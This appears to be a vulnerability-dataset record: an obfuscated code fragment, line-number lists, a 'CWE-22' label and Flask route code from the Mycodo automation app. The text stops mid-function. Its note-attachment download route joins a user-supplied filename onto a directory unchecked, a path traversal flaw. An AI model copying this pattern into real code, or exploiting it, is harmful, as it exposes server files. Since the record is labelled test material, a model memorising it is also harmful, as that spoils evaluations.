VAR_65 = [ t for t in VAR_38 if not os.path.exists(t) ]
if VAR_18 or VAR_65:
VAR_69 = os.path.commonprefix([VAR_2 + os.sep] + VAR_65)
VAR_65 = [ m[len(VAR_69):] for m in VAR_65 ]
log.warn("rebuilding VAR_63 and VAR_64 failed. The following required VAR_67 are VAR_65: %s" % VAR_65)
raise e
else:
log.warn("rebuilding VAR_63 and VAR_64 failed (not a problem)")
log.warn(str(e))
VAR_65 = [ t for t in VAR_38 if not os.path.exists(t) ]
if VAR_65:
VAR_69 = os.path.commonprefix([VAR_2 + os.sep] + VAR_65)
VAR_65 = [ m[len(VAR_69):] for m in VAR_65 ]
raise ValueError("The following required VAR_67 are VAR_65: %s" % VAR_65)
VAR_10.run(self)
return CLASS_5
| [
3,
5,
9,
10,
11,
12,
18,
25,
31,
32,
33,
34,
35,
36,
41,
45,
46,
47,
48,
55,
56,
57,
58,
59,
60,
62,
63,
66,
68,
69,
70,
74,
75,
76,
77,
78,
87,
91,
92,
93,
94,
95,
100,
101,
102,
103,
104,
110,
111,
117,
122,
123,
124,
127,
129,
130,
162,
163,
168,
169,
176,
179,
187,
200,
203,
205,
213,
215,
216,
228,
229,
232,
240,
245,
247,
248,
249,
250,
251,
255,
260,
264,
266,
267,
268,
272,
273,
274,
275,
280,
286,
288,
291,
292,
294,
295,
296,
297,
303,
304,
306,
317,
318,
320,
325,
329,
330,
336,
339,
341,
344,
347,
348,
361,
364,
368,
371,
374,
377,
383,
385,
393,
398,
403,
406,
417,
419,
421,
422,
425,
431,
437,
444,
447,
449,
454,
457,
460,
466,
471,
473,
486,
488,
489,
492,
499,
502,
505,
508,
513,
524,
529,
539,
543,
549,
560,
568,
570,
571,
576,
579,
582,
596,
597,
607,
612,
614,
615,
618,
624,
627,
635,
636,
639,
643,
646,
1,
2,
3,
4,
5,
6,
7,
8,
80,
81,
82,
97,
98,
99,
218,
231,
232,
233,
234,
242,
327,
332,
424,
425,
426,
427,
446,
447,
448,
449,
450,
451,
491,
492,
493,
494,
573,
599,
510,
541,
257,
258,
259,
260,
261,
262,
263,
264,
265
] | [
3,
5,
9,
10,
11,
12,
18,
25,
31,
32,
33,
34,
35,
36,
41,
45,
46,
47,
48,
55,
56,
57,
58,
59,
60,
62,
63,
66,
68,
69,
70,
74,
75,
76,
77,
78,
87,
91,
92,
93,
94,
95,
100,
101,
102,
103,
104,
110,
111,
117,
122,
123,
124,
127,
129,
130,
162,
163,
168,
169,
176,
179,
187,
200,
203,
205,
213,
215,
216,
228,
229,
232,
240,
245,
247,
248,
249,
250,
251,
255,
260,
264,
266,
267,
268,
272,
273,
274,
275,
280,
286,
288,
291,
292,
294,
295,
296,
297,
303,
304,
306,
317,
318,
320,
325,
329,
330,
336,
339,
341,
344,
347,
348,
361,
364,
368,
371,
374,
378,
386,
390,
392,
400,
405,
410,
413,
424,
428,
430,
431,
434,
440,
446,
453,
456,
458,
463,
466,
469,
475,
480,
482,
495,
497,
498,
501,
508,
511,
514,
517,
522,
533,
538,
548,
552,
558,
569,
577,
579,
580,
585,
588,
591,
605,
606,
616,
621,
623,
624,
627,
633,
636,
644,
645,
648,
652,
655,
1,
2,
3,
4,
5,
6,
7,
8,
80,
81,
82,
97,
98,
99,
218,
231,
232,
233,
234,
242,
327,
332,
433,
434,
435,
436,
455,
456,
457,
458,
459,
460,
500,
501,
502,
503,
582,
608,
519,
550,
257,
258,
259,
260,
261,
262,
263,
264,
265
] |
0CWE-22
| # coding=utf-8
import calendar
import datetime
import logging
import subprocess
import time
from importlib import import_module
import flask_login
import os
from dateutil.parser import parse as date_parse
from flask import Response
from flask import flash
from flask import jsonify
from flask import redirect
from flask import send_file
from flask import send_from_directory
from flask import url_for
from flask.blueprints import Blueprint
from flask_babel import gettext
from flask_limiter import Limiter
from influxdb import InfluxDBClient
from sqlalchemy import and_
from mycodo.config import DOCKER_CONTAINER
from mycodo.config import INFLUXDB_DATABASE
from mycodo.config import INFLUXDB_HOST
from mycodo.config import INFLUXDB_PASSWORD
from mycodo.config import INFLUXDB_PORT
from mycodo.config import INFLUXDB_USER
from mycodo.config import INSTALL_DIRECTORY
from mycodo.config import LOG_PATH
from mycodo.config import PATH_CAMERAS
from mycodo.config import PATH_NOTE_ATTACHMENTS
from mycodo.databases.models import Camera
from mycodo.databases.models import Conversion
from mycodo.databases.models import DeviceMeasurements
from mycodo.databases.models import Input
from mycodo.databases.models import Math
from mycodo.databases.models import NoteTags
from mycodo.databases.models import Notes
from mycodo.databases.models import Output
from mycodo.databases.models import OutputChannel
from mycodo.databases.models import PID
from mycodo.devices.camera import camera_record
from mycodo.mycodo_client import DaemonControl
from mycodo.mycodo_flask.routes_authentication import clear_cookie_auth
from mycodo.mycodo_flask.utils import utils_general
from mycodo.mycodo_flask.utils.utils_general import get_ip_address
from mycodo.mycodo_flask.utils.utils_output import get_all_output_states
from mycodo.utils.database import db_retrieve_table
from mycodo.utils.image import generate_thermal_image_from_pixels
from mycodo.utils.influx import influx_time_str_to_milliseconds
from mycodo.utils.influx import query_string
from mycodo.utils.system_pi import assure_path_exists
from mycodo.utils.system_pi import is_int
from mycodo.utils.system_pi import return_measurement_info
from mycodo.utils.system_pi import str_is_float
blueprint = Blueprint('routes_general',
__name__,
static_folder='../static',
template_folder='../templates')
logger = logging.getLogger(__name__)
limiter = Limiter(key_func=get_ip_address)
@blueprint.route('/')
def home():
"""Load the default landing page"""
try:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.landing_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.landing_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.landing_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
logger.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@blueprint.route('/index_page')
def index_page():
"""Load the index page"""
try:
if not flask_login.current_user.index_page:
return home()
elif flask_login.current_user.index_page == 'landing':
return home()
else:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.index_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.index_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.index_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
logger.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@blueprint.route('/settings', methods=('GET', 'POST'))
@flask_login.login_required
def page_settings():
return redirect('settings/general')
@blueprint.route('/note_attachment/<filename>')
@flask_login.login_required
def send_note_attachment(filename):
"""Return a file from the note attachment directory"""
file_path = os.path.join(PATH_NOTE_ATTACHMENTS, filename)
if file_path is not None:
try:
return send_file(file_path, as_attachment=True)
except Exception:
logger.exception("Send note attachment")
@blueprint.route('/camera/<camera_unique_id>/<img_type>/<filename>')
@flask_login.login_required
def camera_img_return_path(camera_unique_id, img_type, filename):
"""Return an image from stills or time-lapses"""
camera = Camera.query.filter(Camera.unique_id == camera_unique_id).first()
camera_path = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=camera.unique_id)))
if img_type == 'still':
if camera.path_still:
path = camera.path_still
else:
path = os.path.join(camera_path, img_type)
elif img_type == 'timelapse':
if camera.path_timelapse:
path = camera.path_timelapse
else:
path = os.path.join(camera_path, img_type)
else:
return "Unknown Image Type"
if os.path.isdir(path):
files = (files for files in os.listdir(path)
if os.path.isfile(os.path.join(path, files)))
else:
files = []
if filename in files:
path_file = os.path.join(path, filename)
return send_file(path_file, mimetype='image/jpeg')
return "Image not found"
@blueprint.route('/camera_acquire_image/<image_type>/<camera_unique_id>/<max_age>')
@flask_login.login_required
def camera_img_acquire(image_type, camera_unique_id, max_age):
"""Capture an image and return the filename"""
if image_type == 'new':
tmp_filename = None
elif image_type == 'tmp':
tmp_filename = '{id}_tmp.jpg'.format(id=camera_unique_id)
else:
return
path, filename = camera_record('photo', camera_unique_id, tmp_filename=tmp_filename)
image_path = os.path.join(path, filename)
time_max_age = datetime.datetime.now() - datetime.timedelta(seconds=int(max_age))
timestamp = os.path.getctime(image_path)
if datetime.datetime.fromtimestamp(timestamp) > time_max_age:
date_time = datetime.datetime.fromtimestamp(timestamp).strftime('%Y-%m-%d %H:%M:%S')
return_values = '["{}","{}"]'.format(filename, date_time)
else:
return_values = '["max_age_exceeded"]'
return Response(return_values, mimetype='text/json')
@blueprint.route('/camera_latest_timelapse/<camera_unique_id>/<max_age>')
@flask_login.login_required
def camera_img_latest_timelapse(camera_unique_id, max_age):
"""Capture an image and/or return a filename"""
camera = Camera.query.filter(
Camera.unique_id == camera_unique_id).first()
_, tl_path = utils_general.get_camera_paths(camera)
timelapse_file_path = os.path.join(tl_path, str(camera.timelapse_last_file))
if camera.timelapse_last_file is not None and os.path.exists(timelapse_file_path):
time_max_age = datetime.datetime.now() - datetime.timedelta(seconds=int(max_age))
if datetime.datetime.fromtimestamp(camera.timelapse_last_ts) > time_max_age:
ts = datetime.datetime.fromtimestamp(camera.timelapse_last_ts).strftime("%Y-%m-%d %H:%M:%S")
return_values = '["{}","{}"]'.format(camera.timelapse_last_file, ts)
else:
return_values = '["max_age_exceeded"]'
else:
return_values = '["file_not_found"]'
return Response(return_values, mimetype='text/json')
def gen(camera):
"""Video streaming generator function."""
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@blueprint.route('/video_feed/<unique_id>')
@flask_login.login_required
def video_feed(unique_id):
"""Video streaming route. Put this in the src attribute of an img tag."""
camera_options = Camera.query.filter(Camera.unique_id == unique_id).first()
camera_stream = import_module('mycodo.mycodo_flask.camera.camera_' + camera_options.library).Camera
camera_stream.set_camera_options(camera_options)
return Response(gen(camera_stream(unique_id=unique_id)),
mimetype='multipart/x-mixed-replace; boundary=frame')
@blueprint.route('/outputstate')
@flask_login.login_required
def gpio_state():
"""Return all output states"""
return jsonify(get_all_output_states())
@blueprint.route('/outputstate_unique_id/<unique_id>/<channel_id>')
@flask_login.login_required
def gpio_state_unique_id(unique_id, channel_id):
"""Return the GPIO state, for dashboard output """
channel = OutputChannel.query.filter(OutputChannel.unique_id == channel_id).first()
daemon_control = DaemonControl()
state = daemon_control.output_state(unique_id, channel.channel)
return jsonify(state)
@blueprint.route('/widget_execute/<unique_id>')
@flask_login.login_required
def widget_execute(unique_id):
"""Return the response from the execution of widget code """
daemon_control = DaemonControl()
return_value = daemon_control.widget_execute(unique_id)
return jsonify(return_value)
@blueprint.route('/time')
@flask_login.login_required
def get_time():
""" Return the current time """
return jsonify(datetime.datetime.now().strftime('%m/%d %H:%M'))
@blueprint.route('/dl/<dl_type>/<path:filename>')
@flask_login.login_required
def download_file(dl_type, filename):
"""Serve log file to download"""
if dl_type == 'log':
return send_from_directory(LOG_PATH, filename, as_attachment=True)
return '', 204
@blueprint.route('/last/<unique_id>/<measure_type>/<measurement_id>/<period>')
@flask_login.login_required
def last_data(unique_id, measure_type, measurement_id, period):
"""Return the most recent time and value from influxdb"""
if not str_is_float(period):
return '', 204
if measure_type in ['input', 'math', 'function', 'output', 'pid']:
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if measure_type in ['input', 'math', 'function', 'output', 'pid']:
measure = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
else:
return '', 204
if measure:
conversion = Conversion.query.filter(
Conversion.unique_id == measure.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
measure, conversion)
if hasattr(measure, 'measurement_type') and measure.measurement_type == 'setpoint':
setpoint_pid = PID.query.filter(PID.unique_id == measure.device_id).first()
if setpoint_pid and ',' in setpoint_pid.measurement:
pid_measurement = setpoint_pid.measurement.split(',')[1]
setpoint_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == pid_measurement).first()
if setpoint_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == setpoint_measurement.conversion_id).first()
_, unit, measurement = return_measurement_info(setpoint_measurement, conversion)
try:
if period != '0':
query_str = query_string(
unit, unique_id,
measure=measurement, channel=channel,
value='LAST', past_sec=period)
else:
query_str = query_string(
unit, unique_id,
measure=measurement, channel=channel,
value='LAST')
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
number = len(raw_data['series'][0]['values'])
time_raw = raw_data['series'][0]['values'][number - 1][0]
value = raw_data['series'][0]['values'][number - 1][1]
value = float(value)
# Convert date-time to epoch (potential bottleneck for data)
dt = date_parse(time_raw)
timestamp = calendar.timegm(dt.timetuple()) * 1000
live_data = '[{},{}]'.format(timestamp, value)
return Response(live_data, mimetype='text/json')
except KeyError:
logger.debug("No Data returned form influxdb")
return '', 204
except IndexError:
logger.debug("No Data returned form influxdb")
return '', 204
except Exception as e:
logger.exception("URL for 'last_data' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/past/<unique_id>/<measure_type>/<measurement_id>/<past_seconds>')
@flask_login.login_required
def past_data(unique_id, measure_type, measurement_id, past_seconds):
"""Return data from past_seconds until present from influxdb"""
if not str_is_float(past_seconds):
return '', 204
if measure_type == 'tag':
notes_list = []
tag = NoteTags.query.filter(NoteTags.unique_id == unique_id).first()
notes = Notes.query.filter(
Notes.date_time >= (datetime.datetime.utcnow() - datetime.timedelta(seconds=int(past_seconds)))).all()
for each_note in notes:
if tag.unique_id in each_note.tags.split(','):
notes_list.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if notes_list:
return jsonify(notes_list)
else:
return '', 204
elif measure_type in ['input', 'math', 'function', 'output', 'pid']:
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if measure_type in ['input', 'math', 'function', 'output', 'pid']:
measure = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
else:
measure = None
if not measure:
return "Could not find measurement"
if measure:
conversion = Conversion.query.filter(
Conversion.unique_id == measure.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
measure, conversion)
if hasattr(measure, 'measurement_type') and measure.measurement_type == 'setpoint':
setpoint_pid = PID.query.filter(PID.unique_id == measure.device_id).first()
if setpoint_pid and ',' in setpoint_pid.measurement:
pid_measurement = setpoint_pid.measurement.split(',')[1]
setpoint_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == pid_measurement).first()
if setpoint_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == setpoint_measurement.conversion_id).first()
_, unit, measurement = return_measurement_info(setpoint_measurement, conversion)
try:
query_str = query_string(
unit, unique_id,
measure=measurement,
channel=channel,
past_sec=past_seconds)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
if 'series' in raw_data and raw_data['series']:
return jsonify(raw_data['series'][0]['values'])
else:
return '', 204
except Exception as e:
logger.debug("URL for 'past_data' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/generate_thermal_image/<unique_id>/<timestamp>')
@flask_login.login_required
def generate_thermal_image_from_timestamp(unique_id, timestamp):
"""Return a file from the note attachment directory"""
ts_now = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
camera_path = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=unique_id)))
filename = 'Still-{uid}-{ts}.jpg'.format(
uid=unique_id,
ts=ts_now).replace(" ", "_")
save_path = assure_path_exists(os.path.join(camera_path, 'thermal'))
assure_path_exists(save_path)
path_file = os.path.join(save_path, filename)
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
input_dev = Input.query.filter(Input.unique_id == unique_id).first()
pixels = []
success = True
start = int(int(timestamp) / 1000.0) # Round down
end = start + 1 # Round up
start_timestamp = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(start))
end_timestamp = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(end))
for each_channel in range(input_dev.channels):
measurement = 'channel_{chan}'.format(
chan=each_channel)
query_str = query_string(measurement, unique_id,
start_str=start_timestamp,
end_str=end_timestamp)
if query_str == 1:
logger.error('Invalid query string')
success = False
else:
raw_data = dbcon.query(query_str).raw
if not raw_data or 'series' not in raw_data or not raw_data['series']:
logger.error('No measurements to export in this time period')
success = False
else:
pixels.append(raw_data['series'][0]['values'][0][1])
# logger.error("generate_thermal_image_from_timestamp: success: {}, pixels: {}".format(success, pixels))
if success:
generate_thermal_image_from_pixels(pixels, 8, 8, path_file)
return send_file(path_file, mimetype='image/jpeg')
else:
return "Could not generate image"
@blueprint.route('/export_data/<unique_id>/<measurement_id>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def export_data(unique_id, measurement_id, start_seconds, end_seconds):
"""
Return data from start_seconds to end_seconds from influxdb.
Used for exporting data.
"""
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE, timeout=100)
output = Output.query.filter(Output.unique_id == unique_id).first()
input_dev = Input.query.filter(Input.unique_id == unique_id).first()
math = Math.query.filter(Math.unique_id == unique_id).first()
if output:
name = output.name
elif input_dev:
name = input_dev.name
elif math:
name = math.name
else:
name = None
device_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
if device_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == device_measurement.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
device_measurement, conversion)
utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now()
start = datetime.datetime.fromtimestamp(float(start_seconds))
start += utc_offset_timedelta
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.fromtimestamp(float(end_seconds))
end += utc_offset_timedelta
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, unique_id,
measure=measurement, channel=channel,
start_str=start_str, end_str=end_str)
if query_str == 1:
flash('Invalid query string', 'error')
return redirect(url_for('routes_page.page_export'))
raw_data = dbcon.query(query_str).raw
if not raw_data or 'series' not in raw_data or not raw_data['series']:
flash('No measurements to export in this time period', 'error')
return redirect(url_for('routes_page.page_export'))
# Generate column names
col_1 = 'timestamp (UTC)'
col_2 = '{name} {meas} ({id})'.format(
name=name, meas=measurement, id=unique_id)
csv_filename = '{id}_{name}_{meas}.csv'.format(
id=unique_id, name=name, meas=measurement)
import csv
from io import StringIO
def iter_csv(data):
""" Stream CSV file to user for download """
line = StringIO()
writer = csv.writer(line)
writer.writerow([col_1, col_2])
for csv_line in data:
writer.writerow([
str(csv_line[0][:-4]).replace('T', ' '),
csv_line[1]
])
line.seek(0)
yield line.read()
line.truncate(0)
line.seek(0)
response = Response(iter_csv(raw_data['series'][0]['values']), mimetype='text/csv')
response.headers['Content-Disposition'] = 'attachment; filename="{}"'.format(csv_filename)
return response
@blueprint.route('/async/<device_id>/<device_type>/<measurement_id>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def async_data(device_id, device_type, measurement_id, start_seconds, end_seconds):
"""
Return data from start_seconds to end_seconds from influxdb.
Used for asynchronous graph display of many points (up to millions).
"""
if device_type == 'tag':
notes_list = []
tag = NoteTags.query.filter(NoteTags.unique_id == device_id).first()
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
if end_seconds == '0':
end = datetime.datetime.utcnow()
else:
end = datetime.datetime.utcfromtimestamp(float(end_seconds))
notes = Notes.query.filter(
and_(Notes.date_time >= start, Notes.date_time <= end)).all()
for each_note in notes:
if tag.unique_id in each_note.tags.split(','):
notes_list.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if notes_list:
return jsonify(notes_list)
else:
return '', 204
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if device_type in ['input', 'math', 'function', 'output', 'pid']:
measure = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
else:
measure = None
if not measure:
return "Could not find measurement"
if measure:
conversion = Conversion.query.filter(
Conversion.unique_id == measure.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
measure, conversion)
# Set the time frame to the past year if start/end not specified
if start_seconds == '0' and end_seconds == '0':
# Get how many points there are in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='COUNT')
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
first_point = raw_data['series'][0]['values'][0][0]
except:
return '', 204
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
# Set the time frame to the past start epoch to now
elif start_seconds != '0' and end_seconds == '0':
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
count_points = raw_data['series'][0]['values'][0][1]
except:
return '', 204
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
first_point = raw_data['series'][0]['values'][0][0]
except:
return '', 204
else:
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcfromtimestamp(float(end_seconds))
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
count_points = raw_data['series'][0]['values'][0][1]
except:
return '', 204
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
first_point = raw_data['series'][0]['values'][0][0]
except:
return '', 204
start = datetime.datetime.strptime(
influx_time_str_to_milliseconds(first_point),
'%Y-%m-%dT%H:%M:%S.%f')
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
logger.debug('Count = {}'.format(count_points))
logger.debug('Start = {}'.format(start))
logger.debug('End = {}'.format(end))
# How many seconds between the start and end period
time_difference_seconds = (end - start).total_seconds()
logger.debug('Difference seconds = {}'.format(time_difference_seconds))
# If there are more than 700 points in the time frame, we need to group
# data points into 700 groups with points averaged in each group.
if count_points > 700:
# Average period between input reads
seconds_per_point = time_difference_seconds / count_points
logger.debug('Seconds per point = {}'.format(seconds_per_point))
# How many seconds to group data points in
group_seconds = int(time_difference_seconds / 700)
logger.debug('Group seconds = {}'.format(group_seconds))
try:
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='MEAN',
start_str=start_str,
end_str=end_str,
group_sec=group_seconds)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
return jsonify(raw_data['series'][0]['values'])
except:
return '', 204
except Exception as e:
logger.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
return jsonify(raw_data['series'][0]['values'])
except Exception as e:
logger.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/async_usage/<device_id>/<unit>/<channel>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def async_usage_data(device_id, unit, channel, start_seconds, end_seconds):
"""
Return data from start_seconds to end_seconds from influxdb.
Used for asynchronous energy usage display of many points (up to millions).
"""
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
# Set the time frame to the past year if start/end not specified
if start_seconds == '0' and end_seconds == '0':
# Get how many points there are in the past year
query_str = query_string(
unit, device_id,
channel=channel,
value='COUNT')
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
channel=channel,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
first_point = raw_data['series'][0]['values'][0][0]
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
# Set the time frame to the past start epoch to now
elif start_seconds != '0' and end_seconds == '0':
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
first_point = raw_data['series'][0]['values'][0][0]
else:
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcfromtimestamp(float(end_seconds))
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
first_point = raw_data['series'][0]['values'][0][0]
start = datetime.datetime.strptime(
influx_time_str_to_milliseconds(first_point),
'%Y-%m-%dT%H:%M:%S.%f')
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
logger.debug('Count = {}'.format(count_points))
logger.debug('Start = {}'.format(start))
logger.debug('End = {}'.format(end))
# How many seconds between the start and end period
time_difference_seconds = (end - start).total_seconds()
logger.debug('Difference seconds = {}'.format(time_difference_seconds))
# If there are more than 700 points in the time frame, we need to group
# data points into 700 groups with points averaged in each group.
if count_points > 700:
# Average period between input reads
seconds_per_point = time_difference_seconds / count_points
logger.debug('Seconds per point = {}'.format(seconds_per_point))
# How many seconds to group data points in
group_seconds = int(time_difference_seconds / 700)
logger.debug('Group seconds = {}'.format(group_seconds))
try:
query_str = query_string(
unit, device_id,
channel=channel,
value='MEAN',
start_str=start_str,
end_str=end_str,
group_sec=group_seconds)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
return jsonify(raw_data['series'][0]['values'])
except Exception as e:
logger.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
query_str = query_string(
unit, device_id,
channel=channel,
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
return jsonify(raw_data['series'][0]['values'])
except Exception as e:
logger.error("URL for 'async_usage' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/output_mod/<output_id>/<channel>/<state>/<output_type>/<amount>')
@flask_login.login_required
def output_mod(output_id, channel, state, output_type, amount):
""" Manipulate output (using non-unique ID) """
if not utils_general.user_has_permission('edit_controllers'):
return 'Insufficient user permissions to manipulate outputs'
if is_int(channel):
# if an integer was returned
output_channel = int(channel)
else:
# if a channel ID was returned
channel_dev = db_retrieve_table(OutputChannel).filter(
OutputChannel.unique_id == channel).first()
if channel_dev:
output_channel = channel_dev.channel
else:
return "Could not determine channel number from channel ID '{}'".format(channel)
daemon = DaemonControl()
if (state in ['on', 'off'] and str_is_float(amount) and
(
(output_type in ['sec', 'pwm'] and float(amount) >= 0) or
output_type == 'vol' or
output_type == 'value'
)):
out_status = daemon.output_on_off(
output_id,
state,
output_type=output_type,
amount=float(amount),
output_channel=output_channel)
if out_status[0]:
return 'ERROR: {}'.format(out_status[1])
else:
return 'SUCCESS: {}'.format(out_status[1])
else:
return 'ERROR: unknown parameters: ' \
'output_id: {}, channel: {}, state: {}, output_type: {}, amount: {}'.format(
output_id, channel, state, output_type, amount)
@blueprint.route('/daemonactive')
@flask_login.login_required
def daemon_active():
"""Return 'alive' if the daemon is running"""
try:
control = DaemonControl()
return control.daemon_status()
except Exception as e:
logger.error("URL for 'daemon_active' raised and error: "
"{err}".format(err=e))
return '0'
@blueprint.route('/systemctl/<action>')
@flask_login.login_required
def computer_command(action):
"""Execute one of several commands as root"""
if not utils_general.user_has_permission('edit_settings'):
return redirect(url_for('routes_general.home'))
try:
